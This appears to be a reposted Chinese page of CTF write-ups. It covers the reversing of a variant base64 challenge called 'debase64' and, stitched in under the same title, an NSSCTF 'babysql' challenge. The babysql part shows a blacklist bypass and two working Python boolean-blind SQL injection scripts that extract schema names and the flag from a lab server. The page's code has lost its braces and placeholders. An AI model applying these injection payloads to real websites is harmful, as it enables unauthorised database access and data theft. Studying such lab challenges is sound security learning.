NSSCTF逆向2023题目《debase64》
Posted Corax0o0
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSSCTF逆向2023题目《debase64》相关的知识,希望对你有一定的参考价值。
总览
debase64 变种base64解密
题目debase64
解法
这道题是有点抽象的。
首先打开看看是啥东西
输入什么东西都不给回显
那打开exeinfo看看
无壳32 放ida看看吧
main函数就是长这个样子
最关键的就是这个
应该就是这个解码的函数,传入了我们输入的v15 打开看看
里面长这个样子,通过移位可以依稀看到一些base64的痕迹。
仔细分析一下 上面那坨代码大概就是赋四个值。
这个时候我脑子有点没转过来 才发现这个是debase64也就是解密
所以我们输入的就是base64之后的秘闻 所以是四个组成三个字符
这样一看四个 也能理解了。
但是下面这一坨
说实话跟普通的base64是不一样的,我也有点看懵逼
看看别人的wp,这个地方意思就是 逆序处理base64,意思就是按照逆向处理的字符是四个一组反着来的
。
ok
现在的逆向思路就是把里面的这个
按照base64加密出来人,然后手动解开,但是要注意后面几位是0 也就是我们还需要自己爆破 来和题目给的md5值比较。
脚本如下
解出来的就是这样
Ru0Yllae0nKys4Bw/w
Y0uReallyKn0wB4s/w==
里面的/w是错的 最后三个是等号
Y0uReallyKn0wB4s?===
爆破出来
flag Y0uReallyKn0wB4s3===
[NSSCTF 2022 Spring Recruit]babysql
https://www.ctfer.vip/problem/2075
根据输入框的提示传入tarnish
返回如下
简单测试下发现黑名单:hacker!!black_list is /if|and|\\s|#|--/i
把注释符号都过滤了,可以使用闭合的方法构造注入,空格使用/**/
绕过
这里采用同或(!=!)
来构造注入
同或 !=! 的逻辑:
1 !=! 1 == 1
1 !=! 0 == 0
0 !=! 1 == 0
0 !=! 0 == 1
mysql> select 1 !=! 0 !=! 1;
+---------------+
| 1 !=! 0 !=! 1 |
+---------------+
| 0 |
+---------------+
1 row in set (0.01 sec)
mysql> select 1 !=! 1 !=! 1;
+---------------+
| 1 !=! 1 !=! 1 |
+---------------+
| 1 |
+---------------+
1 row in set (0.00 sec)
mysql> select * from users where uid=1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
| 1 | admin | admin |
+-----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from users where uid=1 !=! 0 !=! 1;
+-----+---------------+----------------------------------+
| uid | username | password |
+-----+---------------+----------------------------------+
| 2 | mochu7 | mochu7 |
| 3 | flag | flagThe_Sql_F14g_0f_mochu7 |
| 0 | Administrator | 874a0300d72a3676c4413ce52454eff7 |
| 4 | testuser | 123456 |
+-----+---------------+----------------------------------+
4 rows in set (0.00 sec)
mysql> select * from users where uid=1 !=! 1 !=! 1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
| 1 | admin | admin |
+-----+----------+----------+
1 row in set (0.00 sec)
username=tarnish'!=!(1)!=!'1 (True !=! True !=! True) == True
username=tarnish'!=!(0)!=!'1 (True !=! False !=! True) == False
布尔盲注,脚本跑
import requests
asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28085/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded"
content = ''
for i in range(1, 100):
for s in asc_str:
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))=)/**/!=!/**/'1".format(i, ord(s))
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))=)/**/!=!/**/'1".format(i, ord(s))
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))=)/**/!=!/**/'1".format(i, ord(s))
payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))=)/**/!=!/**/'1".format(i, ord(s))
burp0_data = "username": payload
resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
if 'string(39)' in resp.text:
content += s
print(content)
最笨的办法,比较慢,需要多等一会,追求效率可以使用二分法。
二分法
import requests
asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28758/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded"
content = ''
for pos in range(1, 100):
min_num = 32
max_num = 126
mid_num = (min_num + max_num) // 2
while(min_num < max_num):
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))>)/**/!=!/**/'1".format(pos, mid_num)
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))>)/**/!=!/**/'1".format(pos, mid_num)
burp0_data = "username": payload
resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
if 'string(39)' in resp.text:
min_num = mid_num + 1
else:
max_num = mid_num
mid_num = (min_num + max_num) // 2
content += chr(min_num)
print(content)
以上是关于NSSCTF逆向2023题目《debase64》的主要内容,如果未能解决你的问题,请参考以下文章
NSSCTF逆向2023题目《doublegame》《fake_game》《easy_pyc》《For Aiur》
NSSCTF逆向2023题目《程序和人有一个能跑就行了》《encode》
[NSSCTF 2022 Spring Recruit]babysql